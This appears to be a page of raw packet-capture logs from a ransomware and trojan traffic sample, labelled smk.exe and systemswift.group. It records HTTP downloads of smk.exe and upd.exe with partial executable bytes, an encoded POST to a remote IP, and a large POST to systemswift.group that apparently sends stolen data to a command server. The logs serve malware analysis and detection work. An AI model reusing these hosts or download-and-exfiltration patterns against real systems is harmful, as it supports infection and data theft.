2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E.....@...k.
.eB. .. ......d...P....x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T

smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E.....@.....
.
.
.
.. .P.9....uHP.@)D...GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E.....@.@.DX
.
.
.
..P. …..9.tP…+……………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%………….
.....L.-. .-.............Y.-.(.-.............f.-.<.-.............r.-.D.-.....................~.-.......-...-...-...-.......-.......-.....ADVAPI32.dll.KERNEL32.DLL.MSIMG32.dll.USER32.dll....RegEnumKeyA...ExitProcess...GetProcAddress..LoadLibraryA..VirtualProtect..AlphaBlend..CreateIcon................................
2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E.....@.@.DW
.
2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
E.....@.....
.
.
.
..!.PU.j.n...P.@)....GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
E....1@...-P
.
.W.X..$.P...$Y.K.P.@)....POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
E..C.V@...(.
.
.W.X..$.P..+.Y.K.P.@)H...|.[0.m}.*u.S..#u.#u.#u.#..6a.#u.#g.6f.K/. ..Vu.l .wo.2X.D0.Q..9u.3a...j1.lu.m3...w4.g4.gu.D..D'.s=.&.B1.s!.qX.Q..G..@=.j;.gu.GX.Q..#..:.f'.N<.q:.#..j#.qX.Q..#..e9.!.qu.j&.o4.#..j#.qX.._. X.X..p!.nu.q:.f&.^X. ..p!.nX. \.n&.-0.fX.&.p&.f-...j;.m<.-0.fX. &.q#.0.-0.fX. \.u6.l&.-0.fX. \.g9.k:.w{.{0. \. 1.o=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... .t8.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.l:.p#.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. ..b'.k..g0.f'.f-.._. \.f4.=.q:.l6.o..p!.f-... .f4.&.p&.f-...G#.U..H'.B..n8.Ke.-0.fX.v%.Xd.-0.fu... ..q:.w9.+m.5{.-g.2m.._.HT..U..U..U..U..(.....U#.U.+U..U..U..u..U..U.A'.t&.q&.@:.h<.p .m!.q;.w..s9.q0.O:.-!.w...W..[..U..U..U.R...U.....U..U..U..T.#U.....U.l:.j0.j&.-!.w...W..[..U..U..U.&..l...:?.U..U..U..T.#U.....U..1c.1..4m.Bf.5d.7..3x.A...f.1b.5a.Gf.Ax.7...a.Gb.;.E`.:..1..6f.4b.Ex.1m..a.7d.Bc.2x.2g.5g.3b.6..3c..a.7e.A..1x.Bg.Ec.2..1..6a.Ex.7...m.Ef.Gl.3..2l.2g.
2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
E ...:@./...W.X.
.
..P.$Y.K...0IP.. .o..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40